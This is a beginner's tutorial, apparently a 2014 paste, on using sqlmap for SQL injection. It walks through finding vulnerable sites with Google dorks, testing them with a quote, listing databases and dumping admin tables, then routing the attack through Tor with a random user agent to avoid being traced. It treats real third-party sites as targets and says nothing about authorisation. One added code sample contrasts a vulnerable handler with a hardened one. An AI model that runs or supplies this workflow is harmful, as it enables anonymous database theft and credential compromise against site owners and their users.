Narzew

SQLMap For Dummies v 1.0 by Matrix

Nov 4th, 2014
SQLMAP For Dummies v1.0
By Matrix
http://www.twitter.com/TheAnonMatrix

Required for use: Backtrack5 R1.

Start your Backtrack5 R1 (BT5) and start sqlmap; it can be found in /pentest/database/sqlmap/.
Now let's get started!
First we need a webpage; this is normally found by hand or by using dorks in Google. To find out if a page is vulnerable to an injection we do this:

http://localhost.com/index.php?id=1337'
Notice the ' (single quote) appended to the end of the URL.

If the parameter is pasted into the SQL query unescaped, this should give you a pretty error and a good start!
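
Why the quote test produces an error, and what the fixed page looks like, as an added example (not part of the original paste). It is a Python/sqlite3 stand-in for index.php; the articles table and both handler functions are assumptions made for illustration.

```python
import sqlite3

# Constructed sample data: an in-memory table standing in for the site's database.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
db.execute("INSERT INTO articles VALUES (1337, 'Hello world')")


def vulnerable_page(id_param):
    """Hypothetical index.php?id=... handler: the value is pasted into the SQL text."""
    query = "SELECT title FROM articles WHERE id = " + id_param
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error as exc:
        # Echoing the database error to the client is the "pretty error" above.
        return 500, "SQL error: %s" % exc
    return (200, row[0]) if row else (404, "Not found")


def hardened_page(id_param):
    """Same handler with strict validation, a bound parameter and generic errors."""
    # Accept only a short run of ASCII digits; anything else never reaches SQL.
    if not (id_param.isascii() and id_param.isdigit() and len(id_param) <= 9):
        return 400, "Bad request"
    try:
        row = db.execute("SELECT title FROM articles WHERE id = ?",
                         (int(id_param),)).fetchone()
    except sqlite3.Error:
        return 500, "Internal error"  # details go to the server log, not the client
    return (200, row[0]) if row else (404, "Not found")


if __name__ == "__main__":
    for value in ("1337", "1337'"):
        print(repr(value), vulnerable_page(value), hardened_page(value))
```
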
Let's open sqlmap!
So the first thing you need to learn is the options, or settings, you have to apply in sqlmap. The base is:

python sqlmap.py -u <website>

With a website we would simply do it like this:

python sqlmap.py -u http://localhost/index.php?id=1337
(note we did not add the ' here)

-u stands for URL and tells sqlmap THIS is our URL. But we have to add more options for sqlmap to work:
(note the following options use double dashes)

--dbs to find databases.
--users to find users.

python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users
(for the sake of length we will be assuming you used --dbs in this tutorial)

After this command is run you should come up with 0 results, or some results. If you read the output you might be able to find some databases, and if you do, congratz!
It should look like this:

available databases [2]:
[*] database1
[*] database2

Now to the fun part!

python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1

This tells the program to find tables (--tables) in the database (-D) named database1.
Once you execute this you will find (maybe) tons of tables. Locate the one you want... let's call it admin!

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin

Now you should see the info of the table admin. But now we should be able to dump it! This can be done with --dump or --dump-all.
Examples:

python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump

--dump dumps the selected table's content, --dump-all dumps EVERYTHING!
But, we should be secure?

Tor with SQLMAP:

First find /etc/apt/sources.list, open it and add:

deb http://deb.torproject.org/torproject.org lucid main

Open the terminal and use these commands:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

And now we need more commands run as root:

apt-get update
apt-get install tor tor-geoipdb
apt-get install polipo

Start tor:
/etc/init.d/tor start
Then grab a copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf

Go to /etc/polipo/config and replace the file with the one above. Restart polipo:
/etc/init.d/polipo restart
Congratz! Now you can run sqlmap with TOR!

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --tor --random-agent

Happy safe hacking!

Source:
http://www.coresec.org/2011/04/24/sqlmap-with-tor/
https://www.torproject.org/docs/debian.html.en#ubuntu